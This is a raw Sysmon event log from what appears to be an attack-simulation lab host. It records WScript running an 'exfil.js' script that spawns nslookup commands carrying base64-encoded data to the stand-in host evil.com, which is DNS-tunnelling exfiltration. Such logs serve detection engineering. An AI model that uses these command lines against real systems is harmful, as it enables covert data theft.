14:16:27.622{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0340-000000005F02}7976C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.622{2E1864BB-17BB-629A-0340-000000005F02}79761152C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0240-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0340-000000005F02}7976C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0240-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-17A1-629A-783D-000000005F02}55525544C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-0240-000000005F02}3636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.612{2E1864BB-17BB-629A-0240-000000005F02}3636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlehywi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.607{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgrqbd.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-17BB-629A-0040-000000005F02}28124864C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-0140-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0140-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.585{2E1864BB-17BB-629A-FF3F-000000005F02}76527952C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-0140-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.590{2E1864BB-17BB-629A-0140-000000005F02}6196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-FF3F-000000005F02}7652C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgrqbd.tmp 2>&1 10341000x8000000000000000199314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.569{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0040-000000005F02}2812C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.569{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-0040-000000005F02}2812C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.554{2E1864BB-17BB-629A-0040-000000005F02}28124864C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-FF3F-000000005F02}7652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.554{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-0040-000000005F02}2812C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-FF3F-000000005F02}7652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-17A1-629A-783D-000000005F02}55527044C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-FF3F-000000005F02}7652C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.552{2E1864BB-17BB-629A-FF3F-000000005F02}7652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzgrqbd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.538{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbocb.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.522{2E1864BB-17BB-629A-FD3F-000000005F02}47967616C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-FE3F-000000005F02}1496C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 